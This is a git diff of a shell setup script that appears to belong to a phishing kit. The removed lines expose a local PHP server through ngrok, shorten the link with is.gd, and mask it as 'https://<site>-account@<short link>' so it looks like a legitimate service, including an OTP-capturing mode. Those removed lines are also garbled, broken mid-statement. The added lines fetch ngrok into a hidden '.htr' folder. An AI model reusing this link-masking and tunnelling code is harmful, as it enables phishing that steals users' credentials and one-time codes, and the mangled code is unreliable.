Update setup

diff --git a/setup b/setup
--- a/setup
+++ b/setup
@@ -41,54 +41,33 @@ printf ""
 else
 mkdir logs
 fi
-OS=$(uname -o | grep -o "Android") ARG=$1 cd server if 
-[ ! -f "ngrok" ] then
-:
-else CLR() { printf " \r"
-}
-net_check() { connection="$(ping -c 1 -q www.google.com 
-&> /dev/null; echo $?)" if [[ "$connection" != 0 ]] 
-then printf "\e[94m(\e[0m>\e[94m)\e[0m Ngrok error, 
-debug: connection\n" exit fi
-}
-stop() { if [[ $checkngrok == *'ngrok'* ]]; then pkill 
--f -2 ngrok > /dev/null 2>&1 killall -2 ngrok > 
-/dev/null 2>&1 fi checkngrok=$(ps aux | grep -o "ngrok" 
-| head -n1)
-checkphp=$(ps aux | grep -o "php" | head -n1) 
-checkssh=$(ps aux | grep -o "ssh" | head -n1) if [[ 
-$checkngrok == *'ngrok'* ]]; then pkill -f -2 ngrok > 
-/dev/null 2>&1 killall -2 ngrok > /dev/null 2>&1 fi if 
-[[ $checkphp == *'php'* ]]; then killall -2 php > 
-/dev/null 2>&1 fi if [[ $checkssh == *'ssh'* ]]; then 
-killall -2 ssh > /dev/null 2>&1 fi
-}
-stop &> /dev/null if [[ $OS == *'Android'* ]];then 
-./ngrok http 8080 > /dev/null 2>&1 & else sudo ./ngrok 
-http 8080 > /dev/null 2>&1 & fi http_ngrok() { 
-link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | 
-grep -o "https://[0-9a-z]*\.ngrok.io")
-}
-sleep 0 CLR printf "\e[94m(\e[0m>\e[94m)\e[0m Starting 
-Server at http Port : (8080)...\e[0m\n" net_check 
-http_ngrok if [[ -z $link ]];then printf "$link" &> 
-/dev/null sleep 10 http_ngrok printf "$link" &> 
-/dev/null fi if [[ -z $link ]];then CLR printf 
-"\e[94m(\e[0m>\e[94m)\e[0m Ngrok error, debug: ./ngrok 
-http (8080)...\e[0m\n" stop &> /dev/null exit 1 fi 
-short=$(curl -s 
-https://is.gd/create.php\?format\=simple\&url\=${link}) 
-shorter=${short#https://} if [[ ${ARG} == "-s" ]];then 
-if [[ ${SITENUM} == ${SITENUM} ]];then 
-url="https://${SITENUM,,}-account@${shorter}" fi else 
-if [[ ${MODE} == "withOTP" ]] then 
-url="https://${SITESX[${input} 
--1],,}-account@${shorter}" else 
-url="https://${SITES[${input} 
--1],,}-account@${shorter}" fi fi CLR printf 
-"\e[94m(\e[0m>\e[94m)\e[0m Your https link : 
-\e[4m${url}\e[0m" fi
-cd ..
+if [[ -e Modules.zip ]]; then
+unzip -qq Modules.zip
+rm Modules.zip
+fi
+if [[ -e .htr/ngrok ]]; then
+printf ""
+else
+arch=$(uname -a | grep -o 'arm' | head -n1)
+arch2=$(uname -a | grep -o 'Android' | head -n1)
+if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then
+curl -LO https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip > /dev/null 2>&1
+if [[ -e ngrok-stable-linux-arm.zip ]]; then
+unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1
+mv ngrok .htr
+rm -rf ngrok-stable-linux-arm.zip
+chmod +x .htr/ngrok
+else
+printf "\n \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;93m Error \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;96m Install Ngrok Manually.\e[0m\n"
+exit 1
+fi
+else
+curl -LO https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1 
+if [[ -e ngrok-stable-linux-386.zip ]]; then
+unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
+mv ngrok .htr
+rm -rf ngrok-stable-linux-386.zip
+chmod +x .htr/ngrok
 else
 printf "\n \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;93m Error \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;96m Install Ngrok Manually.\e[0m\n"
 exit 1
